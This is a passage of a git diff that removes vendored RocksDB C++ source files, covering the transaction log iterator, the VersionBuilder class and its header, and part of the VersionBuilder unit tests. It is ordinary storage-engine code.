-             ", Expected seq=%" PRIu64 ", Last flushed seq=%" PRIu64
-             ".Log iterator will reseek the correct batch.",
-             batchSeq, expectedSeq, versions_->LastSequence());
-    reporter_.Info(buf);
-    return false;
-  }
-  return true;
-}
-
-void TransactionLogIteratorImpl::UpdateCurrentWriteBatch(const Slice& record) {
-  std::unique_ptr<WriteBatch> batch(new WriteBatch());
-  WriteBatchInternal::SetContents(batch.get(), record);
-
-  SequenceNumber expectedSeq = currentLastSeq_ + 1;
-  // If the iterator has started, then confirm that we get continuous batches
-  if (started_ && !IsBatchExpected(batch.get(), expectedSeq)) {
-    // Seek to the batch having expected sequence number
-    if (expectedSeq < files_->at(currentFileIndex_)->StartSequence()) {
-      // Expected batch must lie in the previous log file
-      // Avoid underflow.
-      if (currentFileIndex_ != 0) {
-        currentFileIndex_--;
-      }
-    }
-    startingSequenceNumber_ = expectedSeq;
-    // currentStatus_ will be set to Ok if reseek succeeds
-    currentStatus_ = Status::NotFound("Gap in sequence numbers");
-    return SeekToStartSequence(currentFileIndex_, true);
-  }
-
-  currentBatchSeq_ = WriteBatchInternal::Sequence(batch.get());
-  currentLastSeq_ = currentBatchSeq_ +
-                    WriteBatchInternal::Count(batch.get()) - 1;
-  // currentBatchSeq_ can only change here
-  assert(currentLastSeq_ <= versions_->LastSequence());
-
-  currentBatch_ = std::move(batch);
-  isValid_ = true;
-  currentStatus_ = Status::OK();
-}
-
-Status TransactionLogIteratorImpl::OpenLogReader(const LogFile* logFile) {
-  unique_ptr<SequentialFileReader> file;
-  Status s = OpenLogFile(logFile, &file);
-  if (!s.ok()) {
-    return s;
-  }
-  assert(file);
-  currentLogReader_.reset(new log::Reader(
-      options_->info_log, std::move(file), &reporter_,
-      read_options_.verify_checksums_, 0, logFile->LogNumber()));
-  return Status::OK();
-}
-}  //  namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/db/transaction_log_impl.h b/thirdparty/rocksdb/db/transaction_log_impl.h
deleted file mode 100644
index 769d833..0000000
--- a/thirdparty/rocksdb/db/transaction_log_impl.h
+++ /dev/null
@@ -1,124 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#pragma once
-
-#ifndef ROCKSDB_LITE
-#include <vector>
-
-#include "db/log_reader.h"
-#include "db/version_set.h"
-#include "options/db_options.h"
-#include "port/port.h"
-#include "rocksdb/env.h"
-#include "rocksdb/options.h"
-#include "rocksdb/transaction_log.h"
-#include "rocksdb/types.h"
-#include "util/filename.h"
-
-namespace rocksdb {
-
-class LogFileImpl : public LogFile {
- public:
-  LogFileImpl(uint64_t logNum, WalFileType logType, SequenceNumber startSeq,
-              uint64_t sizeBytes) :
-    logNumber_(logNum),
-    type_(logType),
-    startSequence_(startSeq),
-    sizeFileBytes_(sizeBytes) {
-  }
-
-  std::string PathName() const override {
-    if (type_ == kArchivedLogFile) {
-      return ArchivedLogFileName("", logNumber_);
-    }
-    return LogFileName("", logNumber_);
-  }
-
-  uint64_t LogNumber() const override { return logNumber_; }
-
-  WalFileType Type() const override { return type_; }
-
-  SequenceNumber StartSequence() const override { return startSequence_; }
-
-  uint64_t SizeFileBytes() const override { return sizeFileBytes_; }
-
-  bool operator < (const LogFile& that) const {
-    return LogNumber() < that.LogNumber();
-  }
-
- private:
-  uint64_t logNumber_;
-  WalFileType type_;
-  SequenceNumber startSequence_;
-  uint64_t sizeFileBytes_;
-
-};
-
-class TransactionLogIteratorImpl : public TransactionLogIterator {
- public:
-  TransactionLogIteratorImpl(
-      const std::string& dir, const ImmutableDBOptions* options,
-      const TransactionLogIterator::ReadOptions& read_options,
-      const EnvOptions& soptions, const SequenceNumber seqNum,
-      std::unique_ptr<VectorLogPtr> files, VersionSet const* const versions);
-
-  virtual bool Valid() override;
-
-  virtual void Next() override;
-
-  virtual Status status() override;
-
-  virtual BatchResult GetBatch() override;
-
- private:
-  const std::string& dir_;
-  const ImmutableDBOptions* options_;
-  const TransactionLogIterator::ReadOptions read_options_;
-  const EnvOptions& soptions_;
-  SequenceNumber startingSequenceNumber_;
-  std::unique_ptr<VectorLogPtr> files_;
-  bool started_;
-  bool isValid_;  // not valid when it starts of.
-  Status currentStatus_;
-  size_t currentFileIndex_;
-  std::unique_ptr<WriteBatch> currentBatch_;
-  unique_ptr<log::Reader> currentLogReader_;
-  Status OpenLogFile(const LogFile* logFile,
-                     unique_ptr<SequentialFileReader>* file);
-
-  struct LogReporter : public log::Reader::Reporter {
-    Env* env;
-    Logger* info_log;
-    virtual void Corruption(size_t bytes, const Status& s) override {
-      ROCKS_LOG_ERROR(info_log, "dropping %" ROCKSDB_PRIszt " bytes; %s", bytes,
-                      s.ToString().c_str());
-    }
-    virtual void Info(const char* s) { ROCKS_LOG_INFO(info_log, "%s", s); }
-  } reporter_;
-
-  SequenceNumber currentBatchSeq_; // sequence number at start of current batch
-  SequenceNumber currentLastSeq_; // last sequence in the current batch
-  // Used only to get latest seq. num
-  // TODO(icanadi) can this be just a callback?
-  VersionSet const* const versions_;
-
-  // Reads from transaction log only if the writebatch record has been written
-  bool RestrictedRead(Slice* record, std::string* scratch);
-  // Seeks to startingSequenceNumber reading from startFileIndex in files_.
-  // If strict is set,then must get a batch starting with startingSequenceNumber
-  void SeekToStartSequence(uint64_t startFileIndex = 0, bool strict = false);
-  // Implementation of Next. SeekToStartSequence calls it internally with
-  // internal=true to let it find next entry even if it has to jump gaps because
-  // the iterator may start off from the first available entry but promises to
-  // be continuous after that
-  void NextImpl(bool internal = false);
-  // Check if batch is expected, else return false
-  bool IsBatchExpected(const WriteBatch* batch, SequenceNumber expectedSeq);
-  // Update current batch if a continuous batch is found, else return false
-  void UpdateCurrentWriteBatch(const Slice& record);
-  Status OpenLogReader(const LogFile* file);
-};
-}  //  namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/db/version_builder.cc b/thirdparty/rocksdb/db/version_builder.cc
deleted file mode 100644
index e8db675..0000000
--- a/thirdparty/rocksdb/db/version_builder.cc
+++ /dev/null
@@ -1,467 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "db/version_builder.h"
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include <inttypes.h>
-#include <algorithm>
-#include <atomic>
-#include <functional>
-#include <map>
-#include <set>
-#include <thread>
-#include <unordered_map>
-#include <unordered_set>
-#include <utility>
-#include <vector>
-
-#include "db/dbformat.h"
-#include "db/internal_stats.h"
-#include "db/table_cache.h"
-#include "db/version_set.h"
-#include "port/port.h"
-#include "table/table_reader.h"
-
-namespace rocksdb {
-
-bool NewestFirstBySeqNo(FileMetaData* a, FileMetaData* b) {
-  if (a->largest_seqno != b->largest_seqno) {
-    return a->largest_seqno > b->largest_seqno;
-  }
-  if (a->smallest_seqno != b->smallest_seqno) {
-    return a->smallest_seqno > b->smallest_seqno;
-  }
-  // Break ties by file number
-  return a->fd.GetNumber() > b->fd.GetNumber();
-}
-
-namespace {
-bool BySmallestKey(FileMetaData* a, FileMetaData* b,
-                   const InternalKeyComparator* cmp) {
-  int r = cmp->Compare(a->smallest, b->smallest);
-  if (r != 0) {
-    return (r < 0);
-  }
-  // Break ties by file number
-  return (a->fd.GetNumber() < b->fd.GetNumber());
-}
-}  // namespace
-
-class VersionBuilder::Rep {
- private:
-  // Helper to sort files_ in v
-  // kLevel0 -- NewestFirstBySeqNo
-  // kLevelNon0 -- BySmallestKey
-  struct FileComparator {
-    enum SortMethod { kLevel0 = 0, kLevelNon0 = 1, } sort_method;
-    const InternalKeyComparator* internal_comparator;
-
-    bool operator()(FileMetaData* f1, FileMetaData* f2) const {
-      switch (sort_method) {
-        case kLevel0:
-          return NewestFirstBySeqNo(f1, f2);
-        case kLevelNon0:
-          return BySmallestKey(f1, f2, internal_comparator);
-      }
-      assert(false);
-      return false;
-    }
-  };
-
-  struct LevelState {
-    std::unordered_set<uint64_t> deleted_files;
-    // Map from file number to file meta data.
-    std::unordered_map<uint64_t, FileMetaData*> added_files;
-  };
-
-  const EnvOptions& env_options_;
-  Logger* info_log_;
-  TableCache* table_cache_;
-  VersionStorageInfo* base_vstorage_;
-  int num_levels_;
-  LevelState* levels_;
-  // Store states of levels larger than num_levels_. We do this instead of
-  // storing them in levels_ to avoid regression in case there are no files
-  // on invalid levels. The version is not consistent if in the end the files
-  // on invalid levels don't cancel out.
-  std::map<int, std::unordered_set<uint64_t>> invalid_levels_;
-  // Whether there are invalid new files or invalid deletion on levels larger
-  // than num_levels_.
-  bool has_invalid_levels_;
-  FileComparator level_zero_cmp_;
-  FileComparator level_nonzero_cmp_;
-
- public:
-  Rep(const EnvOptions& env_options, Logger* info_log, TableCache* table_cache,
-      VersionStorageInfo* base_vstorage)
-      : env_options_(env_options),
-        info_log_(info_log),
-        table_cache_(table_cache),
-        base_vstorage_(base_vstorage),
-        num_levels_(base_vstorage->num_levels()),
-        has_invalid_levels_(false) {
-    levels_ = new LevelState[num_levels_];
-    level_zero_cmp_.sort_method = FileComparator::kLevel0;
-    level_nonzero_cmp_.sort_method = FileComparator::kLevelNon0;
-    level_nonzero_cmp_.internal_comparator =
-        base_vstorage_->InternalComparator();
-  }
-
-  ~Rep() {
-    for (int level = 0; level < num_levels_; level++) {
-      const auto& added = levels_[level].added_files;
-      for (auto& pair : added) {
-        UnrefFile(pair.second);
-      }
-    }
-
-    delete[] levels_;
-  }
-
-  void UnrefFile(FileMetaData* f) {
-    f->refs--;
-    if (f->refs <= 0) {
-      if (f->table_reader_handle) {
-        assert(table_cache_ != nullptr);
-        table_cache_->ReleaseHandle(f->table_reader_handle);
-        f->table_reader_handle = nullptr;
-      }
-      delete f;
-    }
-  }
-
-  void CheckConsistency(VersionStorageInfo* vstorage) {
-#ifdef NDEBUG
-    if (!vstorage->force_consistency_checks()) {
-      // Dont run consistency checks in release mode except if
-      // explicitly asked to
-      return;
-    }
-#endif
-    // make sure the files are sorted correctly
-    for (int level = 0; level < num_levels_; level++) {
-      auto& level_files = vstorage->LevelFiles(level);
-      for (size_t i = 1; i < level_files.size(); i++) {
-        auto f1 = level_files[i - 1];
-        auto f2 = level_files[i];
-        if (level == 0) {
-          if (!level_zero_cmp_(f1, f2)) {
-            fprintf(stderr, "L0 files are not sorted properly");
-            abort();
-          }
-
-          if (f2->smallest_seqno == f2->largest_seqno) {
-            // This is an external file that we ingested
-            SequenceNumber external_file_seqno = f2->smallest_seqno;
-            if (!(external_file_seqno < f1->largest_seqno ||
-                  external_file_seqno == 0)) {
-              fprintf(stderr, "L0 file with seqno %" PRIu64 " %" PRIu64
-                              " vs. file with global_seqno %" PRIu64 "\n",
-                      f1->smallest_seqno, f1->largest_seqno,
-                      external_file_seqno);
-              abort();
-            }
-          } else if (f1->smallest_seqno <= f2->smallest_seqno) {
-            fprintf(stderr, "L0 files seqno %" PRIu64 " %" PRIu64
-                            " vs. %" PRIu64 " %" PRIu64 "\n",
-                    f1->smallest_seqno, f1->largest_seqno, f2->smallest_seqno,
-                    f2->largest_seqno);
-            abort();
-          }
-        } else {
-          if (!level_nonzero_cmp_(f1, f2)) {
-            fprintf(stderr, "L%d files are not sorted properly", level);
-            abort();
-          }
-
-          // Make sure there is no overlap in levels > 0
-          if (vstorage->InternalComparator()->Compare(f1->largest,
-                                                      f2->smallest) >= 0) {
-            fprintf(stderr, "L%d have overlapping ranges %s vs. %s\n", level,
-                    (f1->largest).DebugString(true).c_str(),
-                    (f2->smallest).DebugString(true).c_str());
-            abort();
-          }
-        }
-      }
-    }
-  }
-
-  void CheckConsistencyForDeletes(VersionEdit* edit, uint64_t number,
-                                  int level) {
-#ifdef NDEBUG
-    if (!base_vstorage_->force_consistency_checks()) {
-      // Dont run consistency checks in release mode except if
-      // explicitly asked to
-      return;
-    }
-#endif
-    // a file to be deleted better exist in the previous version
-    bool found = false;
-    for (int l = 0; !found && l < num_levels_; l++) {
-      const std::vector<FileMetaData*>& base_files =
-          base_vstorage_->LevelFiles(l);
-      for (size_t i = 0; i < base_files.size(); i++) {
-        FileMetaData* f = base_files[i];
-        if (f->fd.GetNumber() == number) {
-          found = true;
-          break;
-        }
-      }
-    }
-    // if the file did not exist in the previous version, then it
-    // is possibly moved from lower level to higher level in current
-    // version
-    for (int l = level + 1; !found && l < num_levels_; l++) {
-      auto& level_added = levels_[l].added_files;
-      auto got = level_added.find(number);
-      if (got != level_added.end()) {
-        found = true;
-        break;
-      }
-    }
-
-    // maybe this file was added in a previous edit that was Applied
-    if (!found) {
-      auto& level_added = levels_[level].added_files;
-      auto got = level_added.find(number);
-      if (got != level_added.end()) {
-        found = true;
-      }
-    }
-    if (!found) {
-      fprintf(stderr, "not found %" PRIu64 "\n", number);
-      abort();
-    }
-  }
-
-  bool CheckConsistencyForNumLevels() {
-    // Make sure there are no files on or beyond num_levels().
-    if (has_invalid_levels_) {
-      return false;
-    }
-    for (auto& level : invalid_levels_) {
-      if (level.second.size() > 0) {
-        return false;
-      }
-    }
-    return true;
-  }
-
-  // Apply all of the edits in *edit to the current state.
-  void Apply(VersionEdit* edit) {
-    CheckConsistency(base_vstorage_);
-
-    // Delete files
-    const VersionEdit::DeletedFileSet& del = edit->GetDeletedFiles();
-    for (const auto& del_file : del) {
-      const auto level = del_file.first;
-      const auto number = del_file.second;
-      if (level < num_levels_) {
-        levels_[level].deleted_files.insert(number);
-        CheckConsistencyForDeletes(edit, number, level);
-
-        auto exising = levels_[level].added_files.find(number);
-        if (exising != levels_[level].added_files.end()) {
-          UnrefFile(exising->second);
-          levels_[level].added_files.erase(number);
-        }
-      } else {
-        if (invalid_levels_[level].count(number) > 0) {
-          invalid_levels_[level].erase(number);
-        } else {
-          // Deleting an non-existing file on invalid level.
-          has_invalid_levels_ = true;
-        }
-      }
-    }
-
-    // Add new files
-    for (const auto& new_file : edit->GetNewFiles()) {
-      const int level = new_file.first;
-      if (level < num_levels_) {
-        FileMetaData* f = new FileMetaData(new_file.second);
-        f->refs = 1;
-
-        assert(levels_[level].added_files.find(f->fd.GetNumber()) ==
-               levels_[level].added_files.end());
-        levels_[level].deleted_files.erase(f->fd.GetNumber());
-        levels_[level].added_files[f->fd.GetNumber()] = f;
-      } else {
-        uint64_t number = new_file.second.fd.GetNumber();
-        if (invalid_levels_[level].count(number) == 0) {
-          invalid_levels_[level].insert(number);
-        } else {
-          // Creating an already existing file on invalid level.
-          has_invalid_levels_ = true;
-        }
-      }
-    }
-  }
-
-  // Save the current state in *v.
-  void SaveTo(VersionStorageInfo* vstorage) {
-    CheckConsistency(base_vstorage_);
-    CheckConsistency(vstorage);
-
-    for (int level = 0; level < num_levels_; level++) {
-      const auto& cmp = (level == 0) ? level_zero_cmp_ : level_nonzero_cmp_;
-      // Merge the set of added files with the set of pre-existing files.
-      // Drop any deleted files.  Store the result in *v.
-      const auto& base_files = base_vstorage_->LevelFiles(level);
-      auto base_iter = base_files.begin();
-      auto base_end = base_files.end();
-      const auto& unordered_added_files = levels_[level].added_files;
-      vstorage->Reserve(level,
-                        base_files.size() + unordered_added_files.size());
-
-      // Sort added files for the level.
-      std::vector<FileMetaData*> added_files;
-      added_files.reserve(unordered_added_files.size());
-      for (const auto& pair : unordered_added_files) {
-        added_files.push_back(pair.second);
-      }
-      std::sort(added_files.begin(), added_files.end(), cmp);
-
-#ifndef NDEBUG
-      FileMetaData* prev_file = nullptr;
-#endif
-
-      for (const auto& added : added_files) {
-#ifndef NDEBUG
-        if (level > 0 && prev_file != nullptr) {
-          assert(base_vstorage_->InternalComparator()->Compare(
-                     prev_file->smallest, added->smallest) <= 0);
-        }
-        prev_file = added;
-#endif
-
-        // Add all smaller files listed in base_
-        for (auto bpos = std::upper_bound(base_iter, base_end, added, cmp);
-             base_iter != bpos; ++base_iter) {
-          MaybeAddFile(vstorage, level, *base_iter);
-        }
-
-        MaybeAddFile(vstorage, level, added);
-      }
-
-      // Add remaining base files
-      for (; base_iter != base_end; ++base_iter) {
-        MaybeAddFile(vstorage, level, *base_iter);
-      }
-    }
-
-    CheckConsistency(vstorage);
-  }
-
-  void LoadTableHandlers(InternalStats* internal_stats, int max_threads,
-                         bool prefetch_index_and_filter_in_cache) {
-    assert(table_cache_ != nullptr);
-    // <file metadata, level>
-    std::vector<std::pair<FileMetaData*, int>> files_meta;
-    for (int level = 0; level < num_levels_; level++) {
-      for (auto& file_meta_pair : levels_[level].added_files) {
-        auto* file_meta = file_meta_pair.second;
-        assert(!file_meta->table_reader_handle);
-        files_meta.emplace_back(file_meta, level);
-      }
-    }
-
-    std::atomic<size_t> next_file_meta_idx(0);
-    std::function<void()> load_handlers_func = [&]() {
-      while (true) {
-        size_t file_idx = next_file_meta_idx.fetch_add(1);
-        if (file_idx >= files_meta.size()) {
-          break;
-        }
-
-        auto* file_meta = files_meta[file_idx].first;
-        int level = files_meta[file_idx].second;
-        table_cache_->FindTable(env_options_,
-                                *(base_vstorage_->InternalComparator()),
-                                file_meta->fd, &file_meta->table_reader_handle,
-                                false /*no_io */, true /* record_read_stats */,
-                                internal_stats->GetFileReadHist(level), false,
-                                level, prefetch_index_and_filter_in_cache);
-        if (file_meta->table_reader_handle != nullptr) {
-          // Load table_reader
-          file_meta->fd.table_reader = table_cache_->GetTableReaderFromHandle(
-              file_meta->table_reader_handle);
-        }
-      }
-    };
-
-    if (max_threads <= 1) {
-      load_handlers_func();
-    } else {
-      std::vector<port::Thread> threads;
-      for (int i = 0; i < max_threads; i++) {
-        threads.emplace_back(load_handlers_func);
-      }
-
-      for (auto& t : threads) {
-        t.join();
-      }
-    }
-  }
-
-  void MaybeAddFile(VersionStorageInfo* vstorage, int level, FileMetaData* f) {
-    if (levels_[level].deleted_files.count(f->fd.GetNumber()) > 0) {
-      // f is to-be-delected table file
-      vstorage->RemoveCurrentStats(f);
-    } else {
-      vstorage->AddFile(level, f, info_log_);
-    }
-  }
-};
-
-VersionBuilder::VersionBuilder(const EnvOptions& env_options,
-                               TableCache* table_cache,
-                               VersionStorageInfo* base_vstorage,
-                               Logger* info_log)
-    : rep_(new Rep(env_options, info_log, table_cache, base_vstorage)) {}
-
-VersionBuilder::~VersionBuilder() { delete rep_; }
-
-void VersionBuilder::CheckConsistency(VersionStorageInfo* vstorage) {
-  rep_->CheckConsistency(vstorage);
-}
-
-void VersionBuilder::CheckConsistencyForDeletes(VersionEdit* edit,
-                                                uint64_t number, int level) {
-  rep_->CheckConsistencyForDeletes(edit, number, level);
-}
-
-bool VersionBuilder::CheckConsistencyForNumLevels() {
-  return rep_->CheckConsistencyForNumLevels();
-}
-
-void VersionBuilder::Apply(VersionEdit* edit) { rep_->Apply(edit); }
-
-void VersionBuilder::SaveTo(VersionStorageInfo* vstorage) {
-  rep_->SaveTo(vstorage);
-}
-
-void VersionBuilder::LoadTableHandlers(
-    InternalStats* internal_stats, int max_threads,
-    bool prefetch_index_and_filter_in_cache) {
-  rep_->LoadTableHandlers(internal_stats, max_threads,
-                          prefetch_index_and_filter_in_cache);
-}
-
-void VersionBuilder::MaybeAddFile(VersionStorageInfo* vstorage, int level,
-                                  FileMetaData* f) {
-  rep_->MaybeAddFile(vstorage, level, f);
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/version_builder.h b/thirdparty/rocksdb/db/version_builder.h
deleted file mode 100644
index 440d4ea..0000000
--- a/thirdparty/rocksdb/db/version_builder.h
+++ /dev/null
@@ -1,45 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-//
-#pragma once
-#include "rocksdb/env.h"
-
-namespace rocksdb {
-
-class TableCache;
-class VersionStorageInfo;
-class VersionEdit;
-struct FileMetaData;
-class InternalStats;
-
-// A helper class so we can efficiently apply a whole sequence
-// of edits to a particular state without creating intermediate
-// Versions that contain full copies of the intermediate state.
-class VersionBuilder {
- public:
-  VersionBuilder(const EnvOptions& env_options, TableCache* table_cache,
-                 VersionStorageInfo* base_vstorage, Logger* info_log = nullptr);
-  ~VersionBuilder();
-  void CheckConsistency(VersionStorageInfo* vstorage);
-  void CheckConsistencyForDeletes(VersionEdit* edit, uint64_t number,
-                                  int level);
-  bool CheckConsistencyForNumLevels();
-  void Apply(VersionEdit* edit);
-  void SaveTo(VersionStorageInfo* vstorage);
-  void LoadTableHandlers(InternalStats* internal_stats, int max_threads,
-                         bool prefetch_index_and_filter_in_cache);
-  void MaybeAddFile(VersionStorageInfo* vstorage, int level, FileMetaData* f);
-
- private:
-  class Rep;
-  Rep* rep_;
-};
-
-extern bool NewestFirstBySeqNo(FileMetaData* a, FileMetaData* b);
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/version_builder_test.cc b/thirdparty/rocksdb/db/version_builder_test.cc
deleted file mode 100644
index 304df2a..0000000
--- a/thirdparty/rocksdb/db/version_builder_test.cc
+++ /dev/null
@@ -1,305 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include <string>
-#include "db/version_edit.h"
-#include "db/version_set.h"
-#include "util/logging.h"
-#include "util/string_util.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-
-namespace rocksdb {
-
-class VersionBuilderTest : public testing::Test {
- public:
-  const Comparator* ucmp_;
-  InternalKeyComparator icmp_;
-  Options options_;
-  ImmutableCFOptions ioptions_;
-  MutableCFOptions mutable_cf_options_;
-  VersionStorageInfo vstorage_;
-  uint32_t file_num_;
-  CompactionOptionsFIFO fifo_options_;
-  std::vector<uint64_t> size_being_compacted_;
-
-  VersionBuilderTest()
-      : ucmp_(BytewiseComparator()),
-        icmp_(ucmp_),
-        ioptions_(options_),
-        mutable_cf_options_(options_),
-        vstorage_(&icmp_, ucmp_, options_.num_levels, kCompactionStyleLevel,
-                  nullptr, false),
-        file_num_(1) {
-    mutable_cf_options_.RefreshDerivedOptions(ioptions_);
-    size_being_compacted_.resize(options_.num_levels);
-  }
-
-  ~VersionBuilderTest() {
-    for (int i = 0; i < vstorage_.num_levels(); i++) {
-      for (auto* f : vstorage_.LevelFiles(i)) {
-        if (--f->refs == 0) {
-          delete f;
-        }
-      }
-    }
-  }
-
-  InternalKey GetInternalKey(const char* ukey,
-                             SequenceNumber smallest_seq = 100) {
-    return InternalKey(ukey, smallest_seq, kTypeValue);
-  }
-
-  void Add(int level, uint32_t file_number, const char* smallest,
-           const char* largest, uint64_t file_size = 0, uint32_t path_id = 0,
-           SequenceNumber smallest_seq = 100, SequenceNumber largest_seq = 100,
-           uint64_t num_entries = 0, uint64_t num_deletions = 0,
-           bool sampled = false, SequenceNumber smallest_seqno = 0,
-           SequenceNumber largest_seqno = 0) {
-    assert(level < vstorage_.num_levels());
-    FileMetaData* f = new FileMetaData;
-    f->fd = FileDescriptor(file_number, path_id, file_size);
-    f->smallest = GetInternalKey(smallest, smallest_seq);
-    f->largest = GetInternalKey(largest, largest_seq);
-    f->smallest_seqno = smallest_seqno;
-    f->largest_seqno = largest_seqno;
-    f->compensated_file_size = file_size;
-    f->refs = 0;
-    f->num_entries = num_entries;
-    f->num_deletions = num_deletions;
-    vstorage_.AddFile(level, f);
-    if (sampled) {
-      f->init_stats_from_file = true;
-      vstorage_.UpdateAccumulatedStats(f);
-    }
-  }
-
-  void UpdateVersionStorageInfo() {
-    vstorage_.UpdateFilesByCompactionPri(ioptions_.compaction_pri);
-    vstorage_.UpdateNumNonEmptyLevels();
-    vstorage_.GenerateFileIndexer();
-    vstorage_.GenerateLevelFilesBrief();
-    vstorage_.CalculateBaseBytes(ioptions_, mutable_cf_options_);
-    vstorage_.GenerateLevel0NonOverlapping();
-    vstorage_.SetFinalized();
-  }
-};
-
-void UnrefFilesInVersion(VersionStorageInfo* new_vstorage) {
-  for (int i = 0; i < new_vstorage->num_levels(); i++) {
-    for (auto* f : new_vstorage->LevelFiles(i)) {
-      if (--f->refs == 0) {
-        delete f;
-      }
-    }
-  }
-}
-
-TEST_F(VersionBuilderTest, ApplyAndSaveTo) {
-  Add(0, 1U, "150", "200", 100U);
-
-  Add(1, 66U, "150", "200", 100U);
-  Add(1, 88U, "201", "300", 100U);
-
-  Add(2, 6U, "150", "179", 100U);
-  Add(2, 7U, "180", "220", 100U);
-  Add(2, 8U, "221", "300", 100U);
-
-  Add(3, 26U, "150", "170", 100U);
-  Add(3, 27U, "171", "179", 100U);
-  Add(3, 28U, "191", "220", 100U);
-  Add(3, 29U, "221", "300", 100U);
-  UpdateVersionStorageInfo();
-
-  VersionEdit version_edit;
-  version_edit.AddFile(2, 666, 0, 100U, GetInternalKey("301"),
-                       GetInternalKey("350"), 200, 200, false);
-  version_edit.DeleteFile(3, 27U);
-
-  EnvOptions env_options;
-
-  VersionBuilder version_builder(env_options, nullptr, &vstorage_);
-
-  VersionStorageInfo new_vstorage(&icmp_, ucmp_, options_.num_levels,
-                                  kCompactionStyleLevel, nullptr, false);
-  version_builder.Apply(&version_edit);
-  version_builder.SaveTo(&new_vstorage);
-
-  ASSERT_EQ(400U, new_vstorage.NumLevelBytes(2));
-  ASSERT_EQ(300U, new_vstorage.NumLevelBytes(3));
-
-  UnrefFilesInVersion(&new_vstorage);
-}
-
-TEST_F(VersionBuilderTest, ApplyAndSaveToDynamic) {
-  ioptions_.level_compaction_dynamic_level_bytes = true;
-
-  Add(0, 1U, "150", "200", 100U, 0, 200U, 200U, 0, 0, false, 200U, 200U);
-  Add(0, 88U, "201", "300", 100U, 0, 100U, 100U, 0, 0, false, 100U, 100U);
-
-  Add(4, 6U, "150", "179", 100U);
-  Add(4, 7U, "180", "220", 100U);
-  Add(4, 8U, "221", "300", 100U);
-
-  Add(5, 26U, "150", "170", 100U);
-  Add(5, 27U, "171", "179", 100U);
-  UpdateVersionStorageInfo();
-
-  VersionEdit version_edit;
-  version_edit.AddFile(3, 666, 0, 100U, GetInternalKey("301"),
-                       GetInternalKey("350"), 200, 200, false);
-  version_edit.DeleteFile(0, 1U);
-  version_edit.DeleteFile(0, 88U);
-
-  EnvOptions env_options;
-
-  VersionBuilder version_builder(env_options, nullptr, &vstorage_);
-
-  VersionStorageInfo new_vstorage(&icmp_, ucmp_, options_.num_levels,
-                                  kCompactionStyleLevel, nullptr, false);
-  version_builder.Apply(&version_edit);
-  version_builder.SaveTo(&new_vstorage);
-
-  ASSERT_EQ(0U, new_vstorage.NumLevelBytes(0));
-  ASSERT_EQ(100U, new_vstorage.NumLevelBytes(3));
-  ASSERT_EQ(300U, new_vstorage.NumLevelBytes(4));
-  ASSERT_EQ(200U, new_vstorage.NumLevelBytes(5));
-
-  UnrefFilesInVersion(&new_vstorage);
-}
-
-TEST_F(VersionBuilderTest, ApplyAndSaveToDynamic2) {
-  ioptions_.level_compaction_dynamic_level_bytes = true;
-
-  Add(0, 1U, "150", "200", 100U, 0, 200U, 200U, 0, 0, false, 200U, 200U);
-  Add(0, 88U, "201", "300", 100U, 0, 100U, 100U, 0, 0, false, 100U, 100U);
-
-  Add(4, 6U, "150", "179", 100U);
-  Add(4, 7U, "180", "220", 100U);
-  Add(4, 8U, "221", "300", 100U);
-
-  Add(5, 26U, "150", "170", 100U);
-  Add(5, 27U, "171", "179", 100U);
-  UpdateVersionStorageInfo();
-
-  VersionEdit version_edit;
-  version_edit.AddFile(4, 666, 0, 100U, GetInternalKey("301"),
-                       GetInternalKey("350"), 200, 200, false);
-  version_edit.DeleteFile(0, 1U);
-  version_edit.DeleteFile(0, 88U);
-  version_edit.DeleteFile(4, 6U);
-  version_edit.DeleteFile(4, 7U);
-  version_edit.DeleteFile(4, 8U);
-
-  EnvOptions env_options;
-
-  VersionBuilder version_builder(env_options, nullptr, &vstorage_);
-
-  VersionStorageInfo new_vstorage(&icmp_, ucmp_, options_.num_levels,
-                                  kCompactionStyleLevel, nullptr, false);
-  version_builder.Apply(&version_edit);
-  version_builder.SaveTo(&new_vstorage);
-
-  ASSERT_EQ(0U, new_vstorage.NumLevelBytes(0));
-  ASSERT_EQ(100U, new_vstorage.NumLevelBytes(4));
-  ASSERT_EQ(200U, new_vstorage.NumLevelBytes(5));
-
-  UnrefFilesInVersion(&new_vstorage);
-}
-
-TEST_F(VersionBuilderTest, ApplyMultipleAndSaveTo) {
-  UpdateVersionStorageInfo();
-
-  VersionEdit version_edit;
-  version_edit.AddFile(2, 666, 0, 100U, GetInternalKey("301"),
-                       GetInternalKey("350"), 200, 200, false);
-  version_edit.AddFile(2, 676, 0, 100U, GetInternalKey("401"),
-                       GetInternalKey("450"), 200, 200, false);
-  version_edit.AddFile(2, 636, 0, 100U, GetInternalKey("601"),
-                       GetInternalKey("650"), 200, 200, false);
-  version_edit.AddFile(2, 616, 0, 100U, GetInternalKey("501"),
-                       GetInternalKey("550"), 200, 200, false);
-  version_edit.AddFile(2, 606, 0, 100U, GetInternalKey("701"),
